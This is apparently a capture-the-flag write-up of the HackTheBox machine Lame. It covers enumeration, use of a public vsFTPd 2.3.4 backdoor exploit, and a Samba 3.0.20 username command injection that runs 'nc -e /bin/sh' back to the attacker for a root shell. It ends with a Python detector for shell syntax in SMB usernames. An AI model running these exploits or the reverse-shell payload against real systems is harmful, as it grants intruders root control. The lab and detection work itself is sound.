Lame
#Linux #Enumeration #FTP #SMB
Lame is an easy-rated Linux machine from HackTheBox created by ch4p. There is no mystery to this machine, which makes it suitable for practice: you identify a service version and search for a matching exploit. In this post, my IP is 10.10.14.49 and the target’s IP is 10.129.223.149.
Gather Information
nmap -p- --open -T5 -v -n 10.129.223.149 -oG AllPorts

nmap -sCV -p 21,22,139,445,3632 10.129.223.149 -oN Target

Port 21 allows anonymous login and the scan reports the version, vsFTPd 2.3.4. Perfect, we will search for that. Port 139 is another SMB service, but from a different workgroup.

ftp 10.129.223.149 # user : anonymous , pass : anonymous

crackmapexec smb 10.129.223.149
smbmap -H 10.129.223.149

smbclient -L 10.129.223.149 -N

smbclient //10.129.223.149/tmp -N
And we can’t log in with a null session?
Exploitation
At this point we have the following information: port 21 is FTP (vsFTPd 2.3.4), port 139 is SMB (unknown version), and port 445 is SMB (3.0.20).
Search: vsFTPd 2.3.4 exploit
git clone https://github.com/ahervias77/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
batcat vsftpd_234_exploit.py

python3 vsftpd_234_exploit.py 10.129.223.149 21 whoami

At https://www.exploit-db.com/ search for Samba 3.0.20 (Windows issue), and download the exploit from https://www.exploit-db.com/exploits/16320
batcat 16320.rb


nc -nlvp 443
smbclient //10.129.223.149/tmp -N --option='client min protocol=NT1'
logon "/=`nohup nc -e /bin/sh 10.10.14.49 443 `"

As you can see, we are connected as root, so we can get both flags directly.
script /dev/null -c bash
cat /home/makis/user.txt
cat /root/root.txt
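
From the defender's side, the logon line above places shell command substitution (backticks) in the SMB username field, which is something a monitoring rule can catch. The following is an added example, not part of the original post or of any tool it uses: it scans session-setup records for usernames carrying shell syntax. The record format, `SAMPLE_LOG`, `classify_username` and `scan` are assumptions made for illustration; the sample lines are constructed and are not Samba's native log format.

```python
import re

# Constructed sample records (NOT Samba's native log format): an assumed
# one-line-per-session-setup audit feed with src= and user="..." fields.
SAMPLE_LOG = r'''
2024-01-01T10:00:01Z src=10.0.0.5 user="alice"
2024-01-01T10:00:07Z src=10.0.0.9 user="WORKGROUP\bob"
2024-01-01T10:01:13Z src=10.10.14.49 user="/=`nohup nc -e /bin/sh 10.10.14.49 443 `"
2024-01-01T10:02:40Z src=10.0.0.7 user="svc-backup$"
2024-01-01T10:03:02Z src=10.0.0.8 user="x;id"
'''

RECORD = re.compile(r'^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+user="(?P<user>.*)"\s*$')

# Shell syntax that has no business in an account name. A trailing "$" alone is
# legitimate (machine accounts), so only "$(" and "${" are treated as suspicious.
RULES = [
    ("backtick command substitution", re.compile(r"`")),
    ("$() or ${} expansion", re.compile(r"\$[({]")),
    ("command separator or pipe", re.compile(r"[;|&]")),
    ("redirection", re.compile(r"[<>]")),
    ("embedded newline", re.compile(r"[\r\n]")),
]

def classify_username(user):
    """Return the names of all rules the username trips (empty list = clean)."""
    return [name for name, rx in RULES if rx.search(user)]

def scan(log_text):
    """Return (timestamp, source, username, reasons) for suspicious records."""
    hits = []
    for line in log_text.splitlines():
        m = RECORD.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines
        reasons = classify_username(m["user"])
        if reasons:
            hits.append((m["ts"], m["src"], m["user"], reasons))
    return hits

if __name__ == "__main__":
    for ts, src, user, reasons in scan(SAMPLE_LOG):
        print(f"{ts} {src} {user!r}: {', '.join(reasons)}")
```
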